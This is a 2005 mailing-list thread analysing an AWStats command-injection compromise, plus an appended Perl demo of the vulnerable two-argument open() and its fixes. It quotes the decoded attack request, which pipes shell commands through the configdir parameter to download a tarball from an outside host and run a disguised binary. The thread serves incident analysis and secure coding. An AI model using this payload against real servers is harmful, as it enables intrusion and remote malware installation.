On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
David Cary Hart wrote:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
I'm not all that familiar with perl, so the following may be completely wrong, but here goes.
awstats.pl contains code to search for its configuration file. A directory name may be specified as a parameter to the script. For each directory that the script searches, it tries the following:
if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf")) ...
Normally, this would cause the file pointed to by the expansion of "$searchdir$PROG.$SiteConfig.conf" to be opened. Now, if $searchdir starts with "|", instead of opening a file and then reading it, this runs the text following the "|" as a command and then reads back the output of the command from a pipe. So by using the "|", the attacker has tricked the script into running his command.
Paul.
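To make the open() point concrete, here is a small stand-alone Perl script, added as an illustration and not taken from awstats.pl or from either poster. It reproduces the two-argument open() quoted above next to the three-argument form that does not interpret the name, and adds a simple check on the directory parameter. The site name "example.com", the helper names, the validation regex and the "#"-terminated payload are all assumptions for the demo; the attacker's real request ended the command list with %00 (a NUL byte) to cut off the trailing file name, the "#" here does the same job as a shell comment. Run it and the injected echo fires only through the two-argument open().

```perl
#!/usr/bin/perl
# Added illustration, not awstats code: a "|"-prefixed $searchdir turns a
# two-argument open() into command execution; two ways to stop it.
use strict;
use warnings;

$| = 1;                                  # keep parent and child output in order

my $PROG       = 'awstats';
my $SiteConfig = 'example.com';          # constructed sample site name

# Vulnerable form: the two-argument open() from awstats.pl. Perl inspects
# the string; a leading "|" means "run the rest as a shell command and give
# me a pipe to its stdin", so the whole "file name" goes to /bin/sh -c.
sub open_config_twoarg {
    my ($searchdir) = @_;
    my $fh;
    return open($fh, "$searchdir$PROG.$SiteConfig.conf") ? $fh : undef;
}

# Hardened form: the three-argument open() with an explicit '<' mode never
# interprets the name, so "|" is merely a character in a (nonexistent) path.
sub open_config_threearg {
    my ($searchdir) = @_;
    my $fh;
    return open($fh, '<', "$searchdir$PROG.$SiteConfig.conf") ? $fh : undef;
}

# Validation belongs in front of either open(): accept only a plain
# directory path of safe characters ending in "/", with no "." or ".."
# components (each component must start with a word character or "-").
sub searchdir_is_sane {
    my ($searchdir) = @_;
    return $searchdir =~ m{\A/?(?:[\w-][\w.-]*/)+\z} ? 1 : 0;
}

# Constructed payload in the spirit of the quoted request: "#" comments out
# the trailing "awstats.example.com.conf" the way the attacker's %00 did.
my $payload = '|echo "[two-arg open] injected command ran" #';

printf "payload looks sane? %s\n",       searchdir_is_sane($payload)        ? "yes" : "no";
printf "/etc/awstats/ looks sane? %s\n", searchdir_is_sane('/etc/awstats/') ? "yes" : "no";
printf "../ looks sane? %s\n",           searchdir_is_sane('../')           ? "yes" : "no";

if (my $fh = open_config_twoarg($payload)) {
    close($fh);                          # waits for the child shell to exit
} else {
    print "two-arg open failed: $!\n";
}

if (my $fh = open_config_threearg($payload)) {
    close($fh);
} else {
    print "three-arg open refused the name, as it should: $!\n";
}
```

The validation check is deliberately stricter than just rejecting "|": in a CGI script the directory parameter should never reach a shell or the filesystem unchecked, and running the script under taint mode (perl -T) would have flagged the untainted use of that parameter as well.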